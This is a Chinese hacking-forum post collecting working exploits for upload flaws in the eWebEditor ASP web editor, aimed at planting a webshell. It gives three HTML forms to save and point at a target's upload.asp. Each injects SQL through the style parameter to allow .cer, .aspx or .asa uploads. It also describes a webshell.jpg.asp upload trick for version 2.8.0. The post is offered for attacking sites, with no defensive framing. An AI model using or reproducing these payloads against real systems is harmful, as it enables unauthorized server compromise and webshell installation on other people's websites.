蓝盟诗人[LUC]蓝客联盟

忘记密码

数据库只读时的eWebEditor的上传漏洞拿webshell总结

2010-10-07 17:36 作者: 来源: 本站 浏览: 1,707 views 我要评论 字号:

来源:网络
相信大家经常会遇到存在ewebeditor但是却没有办法更新样式的情况,这往往是由于管理员为了安全把数据库设置为了只读。就算是只读我们也有办法突破。理论上只要条件符合并且数据库一样就可以利用,并不一定要求版本号完全一致。下面按照版本号分别阐述,保存为htm文件即可利用:
1.ewebeditor 1.0.0 上传漏洞:这个是我仿照冰的原点的exp写的。

[html]
<H1>ewebeditor asp版 1.0.0 上传漏洞利用程序----By HCocoa</H1><br><br>
<form action="http://要上传的地址/ewebeditor/upload.asp?action=save&type=IMAGE&style=hcocoa' union select S_ID,S_Name,S_Dir,S_EditorHeader,S_Body,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer|aspx',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
[/html]

2.ewebeditor 2.1.6 上传漏洞:这个是冰的原点写的,网上到处都有。

[html]
<HTML><HEAD><TITLE>ewebeditor的upload文件上传exp</TITLE><meta http-equiv="Content-Type" content="text/html; charset=gb2312"> </head><body bgcolor=orange>
<tr>不是通杀,版本有区别!我就郁闷,落叶那JJ说文章没说清楚,这份EXP就是根据文章写出来的!落叶那家伙的EXP我看半天没看明白有啥区别!<br></tr>
<tr>文件传到了uploadfile目录下了</tr><br>
<tr>不知道算不算0day,我是冰的原点</tr><br>
<tr>至于利用方法就是修改源文件中的action,然后传cer的马马就行了!</tr><br>
<form action="http://要上传的网址/ewebeditor/upload.asp?action=save&type=IMAGE&style=firefox'%20union%20select%20S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,%20[S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl%20from%20ewebeditor_style%20where%20s_name='standard'%20and%20'a'='a" method=post name=myform enctype="multipart/form-data"><input type=file name=uploadfile size=100 style="width:100%"><input type=submit value=传吧></form>
[/html]

3.ewebeditor 2.7.5 上传漏洞:这个用在修改了可以上传asa但是提示没有工具栏的情况下,作者不明。

[html]
<form action="http://要上传的网址/ewebedit/upload.asp?action=save&type=&style=可以上传asa的样式名" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=1 style="width:100%">
<input type=submit value="上传了"></input>
</form>
[/html]

4.ewebeditor 2.8.0 上传漏洞:前提要开启远程上传,然后传一个webshell.jpg.asp即可,查看源代码即可获得shell地址。

发表评论

*

* (保密)

Ctrl+Enter 快捷回复

会员登录关闭

记住我 忘记密码

注册会员关闭

小提示: 您的密码会通过填写的"电子邮箱"发送给您.

**/